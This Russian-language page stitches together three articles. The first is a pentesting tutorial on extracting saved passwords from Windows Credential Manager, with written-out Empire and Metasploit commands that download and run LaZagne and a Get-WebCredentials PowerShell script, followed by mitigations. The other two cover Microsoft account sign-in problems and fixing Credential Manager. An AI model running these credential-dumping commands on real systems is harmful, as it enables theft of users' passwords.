Windows 7 операционной системе требуются ваши учетные данные

Получение учетных данных: Windows Credential Manager

В этой статье рассказывается о получении учетных данных из Windows Credential Manager, приводятся различные методы, которые могут быть использованы как во внутреннем, так и во внешнем пентестинге.

Знакомство с Credential Manager

Credential Manager (диспетчер учетных данных) был представлен впервые на Windows 7. Он похож на цифровое хранилище для хранения всех учетных данных пользователя в безопасности. Они расположены в папке учетных данных, которую можно найти здесь – %Systemdrive%\Users\ \AppData\Local\Microsoft\Credentials , и именно к этой папке обращается Credential Manager. Он также позволяет добавлять, редактировать, удалять, создавать резервные копии и даже восстанавливать пароли.

Учетные данные, сохраненные в Credential Manager, бывают двух типов:

• Веб-учетные данные : поскольку Edge и Windows являются продуктами одной и той же компании, Credential Manager также имеет доступ к хранящейся информации в браузере, чтобы повысить сохранность учетных данных. Он хранит пароли приложений, предоставленных Microsoft, например, Skype, Microsoft Office и т.д.
• Учетные данные Windows : здесь можно найти все учетные данные для входа в систему Windows. Это касается любой системы, которая подключена к сети.

Приложения, запущенные Windows и хранящие учетные данные пользователя, будут автоматически отображены в Credential Manager. Даже когда пользователь обновляет их, изменения моментально вносятся в диспетчер учетных данных.

Получение доступа к Credential Manager

Для получения доступа к диспетчеру учетных данных, пользователь может просто найти его в меню Пуск или открыть программу с помощью следующих двух методов:

• Панель управления > Учетные записи пользователей > Диспетчер учетных данных
• С помощью командной строки: ввести команду vaultcmd и воспользоваться ее возможностями

При имеющемся подключении к другой системе в сети можно использовать любой из способов, приведенных ниже.

При подключении, когда пользователь вводит пароль и сохраняет его для последующего использования, его учетные данные сохраняются в диспетчере учетных данных.

Независимо от веб-сайта и его политик безопасности, когда человек сохраняет пароль в Edge или любом другом приложении, таком как Skype или Outlook, эти данные также заносятся и в Credential Manager. Например, пользователь сохранил пароль от Gmail, как показано на рисунке ниже:

Теперь пользователь может убедиться в том, что пароль был действительно сохранен.

Пользователь получает доступ к Credential Manager, используя любой уже упомянутый метод. Он обнаруживает, что на вкладке учетные данные Windows хранятся все системные и сетевые пароли.

А на вкладке веб-учетные данные будут показаны пароли приложений и сохраненные в Еdge.

Metasploit

Все эти учетные данные могут быть получены с помощью простых методов. Как только был установлен сеанс Metasploit, все, что нужно сделать, это загрузить Mimikatz и запустить его. Mimikatz – это удивительный инструмент для получения учетных данных.

Чтобы запустить его удаленно с помощью сеанса Metasploit, следует использовать следующую команду:

Как только Mimikatz выполнит свою работу, пользователь получит учетные данные, сохраненные в Credential Manager, как показано на рисунке выше.

Empire

Аналогичным образом, с помощью Empire, пользователь может получить учетные данные путем загрузки Lazagne.exe непосредственно в целевую систему, а затем нужно манипулировать этой утилитой. LaZange – это один из самых популярных инструментов для получения учетных данных.

Нужно использовать следующие команды для сброса учетных данных с помощью этого метода:

shell wget https://github.com/AlessandrZ/LaZagne/releases/download2.4.3/lazagne.exe -outfile lazagne.exe
shell wget
shell dir
shell ./lazagne.exe all

После выполнения команд пользователь может увидеть, что пароли были получены, как показано на рисунке ниже:

CredentialsFileView

Следующий метод заключается в использовании стороннего инструмента – CredentialsFileView. Эта утилита очень эффективна, когда речь заходит о пентестинге. Чтобы использовать данный инструмент, следует просто скачать и запустить его. После запуска он запросит у пользователя пароль Windows.

Как только человек введет пароль, инструмент предоставит ему все необходимые учетные данные, как показано на рисунке ниже:

Windows PowerShell

Этот метод получения паролей может оказаться полезным как во внутреннем, так и во внешнем пентестинге. Во время него пользователь запускает скрипт в Windows PowerShell, его можно найти, перейдя по ссылке . Как только человек откроет скрипт, он получит все веб-учетные данные, как показано на картинке ниже:

Пользователь может применить PowerShell удаленно для получения учетных данных с помощью Metasploit. Это очень просто, так как всего лишь необходимо выполнить комбинацию следующих команд после завершения сеанса:

load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials

И с помощью команд PowerShell пользователь и получит нужные ему учетные данные.

Митигирование

Ниже приведены меры, которые могут быть использованы для обеспечения безопасности паролей пользователя:

• Не стоит хранить пароли в системе, браузере или любом другом приложении
• Следует использовать разные пароли для каждой учетной записи
• Если у пользователя возникли проблемы с запоминанием паролей, то вместо того, чтобы хранить их в виде открытого текста в системе, нужно использовать онлайн-менеджер паролей
• Надо загрузить последнюю версию операционной системы и приложений
• Вручную переходить на страницу входа в систему, а не по какой-то ссылке
• Постоянно пользоваться защитой межсетевого экрана
• Держать своих сотрудников или работодателей в курсе всех происходящих событий

Важно ! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.

Источник

Проблемы с учетной записью Microsoft – варианты обхода

Иногда у некоторых пользователей Windows 10, в том числе и у меня, появляется уведомление о том, что “возникли проблемы с учетной записью Microsoft”. Если у вас возникает такая ошибка, то будут проблемы с синхронизацией настроек и входом в приложения, которые задействуют учетную запись Microsoft. Из приложений, к примеру, Microsoft Office и OneDrive работают с этой учеткой.

Решение проблемы

Я пытался разобраться в причинах данной проблемы, но пока безуспешно. Мне даже не удалось определить какие-либо закономерности возникновения данной ситуации, потому пока буду наблюдать и изучать. Если что-то найду, то опишу это здесь. А пока могу рассказать про два метода: один поможет быстрее подтвердить свою аутентификацию в учетной записи, а второй радикально справиться с проблемой, отключив излишние обращение с серверам по вопросам учетной записи.

Быстрая авторизация

Этот способ полезен тем, кто пользуется сервисами Microsoft, использует синхронизацию и прочее. Суть его заключается в том, чтобы использовать приложение Microsoft Authenticator из магазина приложений вашего смартфона. Оно позволит сократить количество действий по аутентификации! Далее буду рассказывать на основе приложения под iOS…

Для начала вам нужно установить приложение из магазина приложений , запустить его и подключить свою учетную запись Microsoft. После этого, процесс аутентификации в Windows 10 будет сводить к нескольким шагам:

• Устанавливаем, запускаем и подключаем приложение.
• Открываем Параметры или нажимаем по уведомлению о проблемах с учетной записью Microsoft.
• Если открыли Параметры вручную, то жмем раздел “ Система “, а там вкладку “ Общие возможности “
• Жмем на кнопку “ Исправить сейчас “

Дальше появится окошко, на котором надо будет нажать кнопку “ Отправить уведомление ” ( это, если вы корректно установили и подключили мобильное приложение)

• Если кнопки нет, то жмём “ Вместо этого используйте пароль ” и используем классический вариант с логином и паролем.

Источник

Исправление диспетчера учетных данных не работает в Windows 10, 8.1 или 7

Диспетчер учетных данных представляет собой встроенную функцию, расположенную во внутренней системе Windows 8. Эта функция используется Internet Explorer и другими клиентами просмотра веб-страниц для хранения ваших имен пользователей и паролей для различных веб-сайтов и учетных записей.

Теперь, в строках ниже, мы будем проверять, как исправить проблемы, связанные с функцией диспетчера учетных данных, поэтому, если вы имеете дело с неисправностями, не стесняйтесь и прочитайте следующие рекомендации.

Но почему так важно использовать диспетчер учетных данных? Ну, в основном ваше веб-приложение использует эту функцию по умолчанию для хранения ваших личных данных и учетных записей. Затем с помощью этой информации система Windows 8 может автоматически войти на веб-сайты или другие компьютеры.

Поэтому, если Credential Manager не работает должным образом, ваше устройство Windows 8 не сможет сохранить ваши учетные данные, и вы не сможете автоматически входить в различные учетные записи – таким образом, каждый раз, когда вы захотите, потребуется ручная операция. получить доступ к веб-сайту или другому компьютеру.

Решение проблем, связанных с вашими учетными данными, легко, хотя вы можете решить эти проблемы двумя способами: вручную, используя встроенные параметры и получив доступ к Реестру на вашем компьютере; Оба метода будут объяснены ниже, выберите решение для устранения неполадок, которое вы предпочитаете.

Как легко исправить проблемы диспетчера учетных данных в Windows 8

Диспетчер учетных данных является важной частью Windows, но пользователи сообщали о различных проблемах, и, говоря о проблемах, сегодня мы рассмотрим следующие проблемы:

• Диспетчер учетных данных Windows 10 не сохраняет пароль – Это одна из самых распространенных проблем, но вы должны решить ее, введя свои учетные данные вручную или удалив и снова добавив их.
• Ошибка диспетчера учетных данных 0x80070425 . Это довольно распространенная проблема с диспетчером учетных данных. Если у вас возникла эта проблема, обязательно воспользуйтесь одним из наших решений.
• Невозможно открыть диспетчер учетных данных . Одна из наиболее серьезных проблем с диспетчером учетных данных – невозможность открыть его. Это может быть большой проблемой, так как вы вообще не сможете получить доступ к сохраненным паролям.
• Доступ к диспетчеру учетных данных запрещен . Это сообщение об ошибке иногда может появляться при попытке доступа к диспетчеру учетных данных. Обычно это происходит из-за отсутствия определенных привилегий, но вы можете легко решить эту проблему.
• Диспетчер учетных данных продолжает падать – Если происходит сбой в работе диспетчера учетных данных, это может быть большой проблемой. Тем не менее, вы должны быть в состоянии исправить это с помощью одного из наших решений.

Решение 1. Измените настройки Интернета

По словам пользователей, вы можете решить проблемы с Credential Manager, изменив настройки Интернета. Для этого выполните следующие действия:

1. Нажмите Windows Key + R , чтобы открыть диалоговое окно Выполнить . В поле «Выполнить» введите inetcpl.cpl и нажмите Enter или нажмите ОК .
   
2. В окне Свойства Интернета нажмите вкладку Контент и в разделе Автозаполнение выберите Настройки .
   
3. Теперь снимите все флажки и нажмите кнопку ОК , чтобы сохранить изменения.
   
4. Снова нажмите кнопку Настройки , включите все параметры и нажмите ОК , чтобы сохранить изменения.
5. Вернитесь на вкладку Общие и в разделе История просмотра нажмите Удалить .
   
6. Теперь кеш будет очищен, поэтому в конце вы должны перезагрузить компьютер, так как проблема должна быть решена.

После внесения этих изменений проверьте, работает ли Credential Manager.

Решение 2 – Используйте редактор реестра

Немногие пользователи утверждают, что вы можете исправить проблемы с помощью Credential Manager просто с помощью редактора реестра. Для этого выполните следующие действия:

1. Нажмите Windows Key + R и введите regedit . Нажмите Enter или нажмите ОК .
   
2. Из редактора реестра перейдите по следующему пути HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main .
   
3. Направьте свое внимание на правую панель редактора реестра. Оттуда выберите строку FormSuggest PW .
4. Нажмите на него правой кнопкой мыши, выберите Изменить строку и в поле Значение данные введите Да .
5. Если вы не можете найти строку FormSuggest PW , вы можете создать ее вручную, щелкнув правой кнопкой мыши на правой панели и выбрав в меню Создать> Значение строки . Введите FormSuggest PW в качестве имени и повторите инструкции из Шаг 4 .
   
6. Закройте редактор реестра и перезагрузите устройство Windows 8.

После внесения этих изменений в реестр проверьте, решена ли проблема.

• ЧИТАЙТЕ ТАКЖЕ: как добавлять, удалять и редактировать файлы диспетчера учетных данных Windows

Решение 3 – Смена владельца для каталога Vault

Диспетчер учетных данных хранит свою информацию в определенном каталоге Vault. Однако иногда управление учетными данными не работает, поскольку в каталоге Vault отсутствуют определенные разрешения. Чтобы устранить проблему, вам необходимо изменить разрешения вручную, выполнив следующие действия:

1. Откройте Проводник .
2. Теперь перейдите в каталог C: \ ProgramData .
   Примечание. Этот каталог по умолчанию скрыт, и для его обнаружения необходимо перейти на вкладку Вид и проверьте скрытые элементы .
   Кроме того, вы можете просто вставить C: \ ProgramData в адресную строку, чтобы получить прямой доступ к папке.
3. Перейдите в каталог Microsoft . Найдите каталог Vault и щелкните его правой кнопкой мыши. Выберите в меню Свойства .
   
4. Перейдите на вкладку Безопасность и нажмите Дополнительно .
   
5. Нажмите кнопку Изменить разрешения в левом нижнем углу.
   
6. Теперь установите флажок Заменить все записи разрешений дочерних объектов и нажмите Применить и ОК .
   

После этого вам нужно найти папку AC658CB4-9126-49BD-B877-31EEDAB3F204 . Вы сможете найти его в каталоге Vault . Как только вы найдете эту папку, вам нужно сделать следующее:

1. Щелкните правой кнопкой мыши каталог AC658CB4-9126-49BD-B877-31EEDAB3F204 и выберите в меню Свойства . Перейдите на вкладку Безопасность и нажмите кнопку Дополнительно .
2. В разделе Владелец нажмите кнопку Изменить .
   
3. В поле Введите имя объекта для выбора введите Администраторы . Теперь нажмите Проверить имена . Если все в порядке, нажмите ОК .
   
4. Теперь проверьте Заменить владельца на подконтейнерах и объектах . В левом нижнем углу нажмите Заменить все записи разрешений дочерних объектов и нажмите Применить и ОК , чтобы сохранить изменения.
   

Многие пользователи сообщили, что у этих каталогов не было назначено никаких разрешений, и это привело к появлению сообщения об ошибке Access Denied при попытке запустить Credential Manager. После изменения разрешений эта проблема должна быть решена, и вы сможете снова использовать Credential Manager.

• Читайте также: CredentialsFileView позволяет получить доступ к расшифрованным файлам учетных данных в Windows

Решение 4. Установите для службы диспетчера учетных данных значение Автоматически.

Если у вас есть проблемы с Credential Manager, вы можете решить эти проблемы, просто изменив тип запуска его службы. Многие пользователи сообщали, что Credential Manager забывал сохраненные пароли, и если у вас возникла эта проблема, вы можете решить ее, выполнив следующие действия:

1. Нажмите Windows Key + R и введите services.msc . Теперь нажмите Enter или нажмите ОК .
   
2. Список услуг теперь появится. Найдите службу Диспетчер учетных данных и дважды щелкните ее.
   
3. Установите для Тип запуска значение Автоматически и нажмите Применить и ОК , чтобы сохранить изменения.
   

После изменения типа запуска службы ваш менеджер учетных данных должен снова начать работать без каких-либо проблем.Немногие пользователи сообщили, что перезапуск службы Credential Manager устранил проблему, поэтому не стесняйтесь делать это тоже. Чтобы перезапустить этот сервис, просто нажмите кнопку Стоп , подождите несколько секунд, а затем нажмите кнопку Пуск , чтобы снова запустить сервис.

Решение 5. Введите учетные данные вручную

Если диспетчер учетных данных не работает должным образом, вы можете решить проблему, введя свои учетные данные вручную. Пользователи сообщили, что их учетные данные не сохраняются, и вы можете решить проблему, выполнив следующие действия:

1. Нажмите Windows Key + S и введите менеджер учетных данных . Выберите Диспетчер учетных данных в списке результатов.
   
2. При запуске диспетчера учетных данных убедитесь, что выбран учетные данные Windows . Теперь нажмите Добавить общие учетные данные .
   
3. Введите необходимую информацию и нажмите ОК , чтобы сохранить изменения.

Имейте в виду, что вам, возможно, придется повторить это решение несколько раз, чтобы решить эту проблему, поэтому не стесняйтесь попробовать его.

Решение 6. Используйте Microsoft Edge для изменения сохраненных паролей

По словам пользователей, вы можете исправить проблемы с помощью Credential Manager, просто изменив сохраненные пароли в Microsoft Edge. Это относительно просто, и вы можете сделать это, выполнив следующие действия:

• ЧИТАЙТЕ ТАКЖЕ: исправлено: введите сетевые учетные данные в Windows 10

1. Откройте Microsoft Edge .
2. Нажмите кнопку Меню в правом верхнем углу и выберите в меню Настройки .
   
3. Прокрутите страницу до конца и в разделе Дополнительные настройки нажмите Просмотреть дополнительные настройки .
   
4. Прокрутите вниз до раздела Конфиденциальность и услуги и нажмите Управление паролями .
   
5. Появится список сохраненных паролей. Нажмите на любой сохраненный пароль, чтобы изменить его.
   
6. Измените имя пользователя или пароль и нажмите Сохранить .

После этого ваш менеджер учетных данных должен начать работать снова. Если все работает правильно, обязательно отмените все изменения, внесенные в сохраненные пароли в Edge.

Несколько пользователей предложили удалить все сохраненные пароли из Edge, чтобы решить проблему. Прежде чем удалять свои пароли, обязательно экспортируйте их или запишите их, так как вы не сможете их восстановить. Немногие пользователи сообщили, что удаление сохраненных паролей из Edge решило проблему, поэтому обязательно попробуйте это.

Решение 7. Используйте IP-адрес устройства

Если вы не можете получить доступ к сетевому диску, вам, возможно, придется внести несколько изменений в Диспетчер учетных данных. Чтобы решить эту проблему, пользователи предлагают найти проблемные учетные данные и удалить их. Теперь создайте новые учетные данные, но обязательно используйте IP-адрес устройства в процессе создания учетных данных. Теперь введите ваше имя пользователя и пароль, и проблема должна быть решена.

Решение 8 – Удалить каталог защиты

Немногие пользователи сообщили, что они исправили проблему с помощью Credential Manager, просто удалив все файлы из каталога Protect . Имейте в виду, что этот процесс удалит все учетные данные для входа в систему на вашем ПК, поэтому вы можете экспортировать и сохранить свои пароли.

Чтобы удалить содержимое каталога Protect, выполните следующие действия:

1. Нажмите Windows Key + R и введите % appdata% . Теперь нажмите Enter или нажмите ОК .
   
2. Теперь перейдите в каталог Microsoft \ Protect .
3. Войдя в каталог Protect , выберите все файлы и выберите Удалить .
   

После удаления содержимого каталога Protect проблема должна быть полностью решена.

Так вот, как вы можете в любое время решить ваши проблемы с диспетчером учетных данных. Попробуйте оба метода, если первый не работает для вас; Кроме того, если после выполнения этого пошагового руководства у вас по-прежнему возникают проблемы с вашим устройством Windows 8, не стесняйтесь и делитесь с нами своими проблемами, используя поле комментариев ниже, и мы постараемся помочь вам как можно скорее.

Примечание редактора . Этот пост был первоначально опубликован в июле 2014 года и с тех пор был полностью переработан и обновлен для обеспечения свежести, точности и полноты.

Источник